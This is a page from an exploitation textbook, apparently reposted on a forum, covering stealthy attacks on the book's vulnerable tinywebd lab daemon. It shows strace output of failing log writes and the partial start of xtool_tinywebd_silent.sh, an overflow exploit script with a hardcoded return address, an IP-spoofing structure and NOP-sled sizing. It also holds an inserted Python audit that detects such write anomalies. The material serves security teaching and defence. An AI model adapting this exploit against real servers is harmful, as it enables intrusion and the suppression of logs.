Hacking - The Art of Exploitation, 2nd Edition

(Romina) #1
Countermeasures 353

strace is used with the -p command-line argument to attach to a running
process. The -e trace=write argument tells strace to only look at write calls.
Once again, the spoofing exploit tool is used in another terminal to connect
and advance execution.

reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ ps aux | grep tinywebd
root 478 0.0 0.0 1636 420? Ss 23:24 0:00 ./tinywebd
reader 525 0.0 0.0 2880 748 pts/1 R+ 23:24 0:00 grep tinywebd
reader@hacking:~/booksrc $ sudo strace -p 478 -e trace=write
Process 478 attached - interrupt to quit
write(2560, "09/19/2007 23:29:30> ", 21) = -1 EBADF (Bad file descriptor)
write(2560, "From 12.34.56.78:9090 \"GET / HTT".., 47) = -1 EBADF (Bad file descriptor)
Process 478 detached
reader@hacking:~/booksrc $


This output clearly shows the attempts to write to the log file failing.
Normally, we wouldn't be able to overwrite the logfd variable, since the
client_addr_ptr is in the way. Carelessly mangling this pointer will usually
lead to a crash. But since we've made sure this variable points to valid memory
(our injected spoofed address structure), we're free to overwrite the variables
that lie beyond it. Since the tinyweb daemon redirects standard out to
/dev/null, the next exploit script will overwrite the passed logfd variable
with 1, for standard output. This will still prevent entries from being written
to the log file but in a much nicer way—without errors.
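As an added defender-side example (not code from the book), here is a small Python audit of `strace -e trace=write` output like the session above: it flags any write that fails with an error (the EBADF lines shown) and any log-formatted entry that lands on an fd other than the daemon's real log fd, which is how the "silent" variant that writes log lines to fd 1 would still stand out. The expected log fd (3 here) is an assumption the operator would confirm under /proc/<pid>/fd, and the sample lines are constructed for the example.

```python
import re

# Constructed strace sample: the two failing writes from the session above,
# plus one log line diverted to fd 1 (silent variant) and one legitimate write
# to the assumed real log fd (3).
SAMPLE_STRACE = """\
Process 478 attached - interrupt to quit
write(2560, "09/19/2007 23:29:30> ", 21) = -1 EBADF (Bad file descriptor)
write(2560, "From 12.34.56.78:9090 \\"GET / HTT"..., 47) = -1 EBADF (Bad file descriptor)
write(1, "09/19/2007 23:31:02> ", 21) = 21
write(3, "09/19/2007 23:32:10> ", 21) = 21
Process 478 detached
"""

# write(<fd>, "<payload>"[...], <len>) = <ret> [<ERRNO> (...)]
WRITE_RE = re.compile(
    r'^write\((\d+), "(.*)"(?:\.\.\.)?, (\d+)\) = (-?\d+)(?: (E[A-Z]+))?')
# tinywebd log entries start with a "MM/DD/YYYY HH:MM:SS> " timestamp prefix
LOG_PREFIX_RE = re.compile(r'^\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2}> ')


def audit_writes(strace_text, log_fd):
    """Return (line_no, reason) findings for writes that failed outright or
    for log-style entries that went to some fd other than log_fd."""
    findings = []
    for n, line in enumerate(strace_text.splitlines(), 1):
        m = WRITE_RE.match(line)
        if not m:
            continue  # attach/detach banners and non-write lines
        fd, payload, _, ret, err = m.groups()
        fd, ret = int(fd), int(ret)
        if ret < 0:
            findings.append((n, f"write on fd {fd} failed with {err}"))
        elif LOG_PREFIX_RE.match(payload) and fd != log_fd:
            findings.append((n, f"log entry written to fd {fd}, expected {log_fd}"))
    return findings


if __name__ == "__main__":
    for line_no, reason in audit_writes(SAMPLE_STRACE, log_fd=3):
        print(f"line {line_no}: {reason}")
```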

xtool_tinywebd_silent.sh

#!/bin/sh
# Silent stealth exploitation tool for tinywebd
# also spoofs IP address stored in memory

SPOOFIP="12.34.56.78"
SPOOFPORT="9090"

if [ -z "$2" ]; then # If argument 2 is blank
  echo "Usage: $0 <shellcode file> <target IP>"
  exit
fi
FAKEREQUEST="GET / HTTP/1.1\x00"
FR_SIZE=$(perl -e "print \"$FAKEREQUEST\"" | wc -c | cut -f1 -d ' ')
OFFSET=540
RETADDR="\x24\xf6\xff\xbf" # At +100 bytes from buffer @ 0xbffff5c0
FAKEADDR="\xcf\xf5\xff\xbf" # +15 bytes from buffer @ 0xbffff5c0
echo "target IP: $2"
SIZE=$(wc -c $1 | cut -f1 -d ' ')
echo "shellcode: $1 ($SIZE bytes)"
echo "fake request: \"$FAKEREQUEST\" ($FR_SIZE bytes)"
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE - $FR_SIZE - 16))
echo "[Fake Request $FR_SIZE] [spoof IP 16] [NOP $ALIGNED_SLED_SIZE] [shellcode $SIZE] [ret addr 128] [*fake_addr 8]"